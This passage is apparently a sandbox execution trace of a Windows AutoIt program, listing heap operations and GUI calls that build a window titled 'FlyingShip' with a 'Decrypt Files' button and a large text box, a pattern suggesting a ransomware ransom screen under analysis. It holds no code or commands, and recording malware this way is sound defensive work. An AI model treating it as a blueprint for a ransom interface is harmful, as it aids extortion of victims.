lpMem=0xd86708 | out: hHeap=0xbc0000) returned 1 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda318 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86708 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86778 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda450 [0259.188] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86708 | out: hHeap=0xbc0000) returned 1 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda930 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86708 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86788 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2e8 [0259.188] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86708 | out: hHeap=0xbc0000) returned 1 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb048 [0259.188] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde7048 | out: hHeap=0xbc0000) returned 1 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda270 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86708 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86798 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3f0 [0259.188] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86708 | out: hHeap=0xbc0000) returned 1 [0259.188] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2b8 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86738 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86748 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9dd8 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda678 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd866e8 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda660 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd866b8 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bc8 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86728 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86758 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda498 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86768 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda318 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda450 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86778 | out: hHeap=0xbc0000) returned 1 [0259.189] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda930 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2e8 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86788 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda270 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86798 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2b8 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfb048 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde7318 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd866f8 | out: hHeap=0xbc0000) returned 1 [0259.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9be0 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6e90 | out: hHeap=0xbc0000) returned 1 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd86718 | out: hHeap=0xbc0000) returned 1 [0259.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e90 [0259.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0259.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xd86718 [0259.190] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0259.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde7318 [0259.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0259.190] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9be0 [0259.191] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0259.191] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xd866f8 [0259.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xd86798 [0259.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde7048 [0259.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0259.191] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xd86788 [0259.193] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x7df9d4, fWinIni=0x0 | out: pvParam=0x7df9d4) returned 1 [0259.193] GetSystemMetrics (nIndex=7) returned 3 [0259.193] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x7df9d4, fWinIni=0x0 | out: pvParam=0x7df9d4) returned 1 [0259.193] GetSystemMetrics (nIndex=8) returned 3 [0259.193] GetSystemMetrics (nIndex=4) returned 22 [0259.193] SetRect (in: lprc=0x7df9d4, xLeft=0, yTop=0, xRight=800, yBottom=650 | out: lprc=0x7df9d4) returned 1 [0259.193] AdjustWindowRectEx (in: lpRect=0x7df9d4, dwStyle=0x84c00000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x7df9d4) returned 1 [0259.194] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3 GUI", lpWindowName="FlyingShip", dwStyle=0x84c00000, X=318, Y=92, nWidth=806, nHeight=678, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0x60174 [0259.194] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.194] NtdllDialogWndProc_W () returned 0x1 [0259.194] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.194] NtdllDialogWndProc_W () returned 0x0 [0259.195] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.195] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.195] NtdllDialogWndProc_W () returned 0x0 [0259.195] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.195] NtdllDialogWndProc_W () returned 0x0 [0259.195] SetWindowLongW (hWnd=0x60174, nIndex=-21, dwNewLong=0) returned 0 [0259.195] GetClientRect (in: hWnd=0x60174, lpRect=0x7df9d4 | out: lpRect=0x7df9d4) returned 1 [0259.195] GetStockObject (i=17) returned 0x18a0025 [0259.195] SendMessageW (hWnd=0x60174, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0259.195] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.195] NtdllDialogWndProc_W () returned 0x0 [0259.195] GetCursorPos (in: lpPoint=0x7df9a0 | out: lpPoint=0x7df9a0*(x=781, y=507)) returned 1 [0259.195] ScreenToClient (in: hWnd=0x60174, lpPoint=0x7df9a0 | out: lpPoint=0x7df9a0) returned 1 [0259.195] GetAsyncKeyState (vKey=1) returned 0 [0259.195] GetAsyncKeyState (vKey=2) returned 0 [0259.195] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x28, lpTimerFunc=0x291256) returned 0x7fd1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7c98 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7cb0 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7c80 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7c68 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ce0 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31df8 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcec9b8 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7cc8 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7d10 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e08 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xceca78 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7cf8 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7d28 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fc30 | out: hHeap=0xbc0000) returned 1 [0259.196] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31dd8 | out: hHeap=0xbc0000) returned 1 [0259.196] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fc30 [0259.196] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7d28 [0259.196] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31dd8 [0259.196] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7cf8 [0259.196] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.196] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31e08 [0259.196] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fc80 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7d10 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31df8 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7cc8 [0259.197] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31df8 | out: hHeap=0xbc0000) returned 1 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7ce0 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31df8 [0259.197] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31df8 | out: hHeap=0xbc0000) returned 1 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7c68 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31df8 [0259.197] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31df8 | out: hHeap=0xbc0000) returned 1 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7c80 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31df8 [0259.197] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31df8 | out: hHeap=0xbc0000) returned 1 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7cb0 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31df8 [0259.197] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31df8 | out: hHeap=0xbc0000) returned 1 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1c) returned 0xe1fca8 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xa0) returned 0xcff150 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7c98 [0259.197] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31df8 [0259.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7ec0 [0259.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f18 [0259.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7ed8 [0259.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f28 [0259.198] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f38 [0259.198] CreateWindowExW (dwExStyle=0x100, lpClassName="button", lpWindowName="Decrypt Files", dwStyle=0x50030000, X=176, Y=400, nWidth=113, nHeight=41, hWndParent=0x60174, hMenu=0x3, hInstance=0x290000, lpParam=0x0) returned 0x8014a [0259.199] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.199] NtdllDialogWndProc_W () returned 0x2 [0259.199] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.199] NtdllDialogWndProc_W () returned 0x0 [0259.199] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.199] NtdllDialogWndProc_W () returned 0x0 [0259.199] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.199] NtdllDialogWndProc_W () returned 0x0 [0259.200] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.200] NtdllDialogWndProc_W () returned 0x0 [0259.200] GetStockObject (i=17) returned 0x18a0025 [0259.200] SendMessageW (hWnd=0x8014a, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0259.200] GetClientRect (in: hWnd=0x8014a, lpRect=0x7df920 | out: lpRect=0x7df920) returned 1 [0259.200] GetWindowRect (in: hWnd=0x8014a, lpRect=0x7df920 | out: lpRect=0x7df920) returned 1 [0259.200] SetWindowLongW (hWnd=0x8014a, nIndex=-21, dwNewLong=3) returned 0 [0259.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fca8 | out: hHeap=0xbc0000) returned 1 [0259.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7cc8 | out: hHeap=0xbc0000) returned 1 [0259.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7d10 | out: hHeap=0xbc0000) returned 1 [0259.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ce0 | out: hHeap=0xbc0000) returned 1 [0259.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7c68 | out: hHeap=0xbc0000) returned 1 [0259.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7c80 | out: hHeap=0xbc0000) returned 1 [0259.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7cb0 | out: hHeap=0xbc0000) returned 1 [0259.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fc80 | out: hHeap=0xbc0000) returned 1 [0259.200] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e08 | out: hHeap=0xbc0000) returned 1 [0259.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fc80 [0259.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7cb0 [0259.200] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31e08 [0259.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7cb0 | out: hHeap=0xbc0000) returned 1 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fca8 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7cb0 [0259.201] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fcd0 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7c80 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f48 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f58 [0259.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f58 | out: hHeap=0xbc0000) returned 1 [0259.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f48 | out: hHeap=0xbc0000) returned 1 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7c68 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f48 [0259.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f48 | out: hHeap=0xbc0000) returned 1 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7ce0 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f48 [0259.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f48 | out: hHeap=0xbc0000) returned 1 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7d10 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f48 [0259.201] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f48 | out: hHeap=0xbc0000) returned 1 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7cc8 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f48 [0259.201] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7ef0 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f48 | out: hHeap=0xbc0000) returned 1 [0259.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f08 [0259.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f48 [0259.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f20 [0259.202] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f58 [0259.202] GetDC (hWnd=0x0) returned 0xd010720 [0259.202] GetDeviceCaps (hdc=0xd010720, index=90) returned 96 [0259.202] ReleaseDC (hWnd=0x0, hDC=0xd010720) returned 1 [0259.202] CreateFontW (cHeight=-16, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x4b0a01cf [0259.202] SendMessageW (hWnd=0x8014a, Msg=0x30, wParam=0x4b0a01cf, lParam=0x1) returned 0x0 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f20 | out: hHeap=0xbc0000) returned 1 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f58 | out: hHeap=0xbc0000) returned 1 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f08 | out: hHeap=0xbc0000) returned 1 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f48 | out: hHeap=0xbc0000) returned 1 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7c80 | out: hHeap=0xbc0000) returned 1 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7c68 | out: hHeap=0xbc0000) returned 1 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ce0 | out: hHeap=0xbc0000) returned 1 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7d10 | out: hHeap=0xbc0000) returned 1 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ef0 | out: hHeap=0xbc0000) returned 1 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7cc8 | out: hHeap=0xbc0000) returned 1 [0259.202] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fcd0 | out: hHeap=0xbc0000) returned 1 [0259.203] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f48 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fcd0 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7cc8 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f58 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7ef0 [0259.203] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f58 | out: hHeap=0xbc0000) returned 1 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7d10 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f58 [0259.203] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f58 | out: hHeap=0xbc0000) returned 1 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7ce0 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f58 [0259.203] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f58 | out: hHeap=0xbc0000) returned 1 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7c68 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f58 [0259.203] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f58 | out: hHeap=0xbc0000) returned 1 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7c80 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31f58 [0259.203] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f58 | out: hHeap=0xbc0000) returned 1 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x2) returned 0xe31f58 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xa0) returned 0xcff1f8 [0259.203] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f08 [0259.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f68 [0259.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f20 [0259.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f78 [0259.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f38 [0259.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f88 [0259.204] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f98 [0259.204] CreateWindowExW (dwExStyle=0x200, lpClassName="edit", lpWindowName="", dwStyle=0x503110c4, X=16, Y=56, nWidth=768, nHeight=329, hWndParent=0x60174, hMenu=0x4, hInstance=0x290000, lpParam=0x0) returned 0x40168 [0259.211] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0259.211] NtdllDialogWndProc_W () returned 0x0 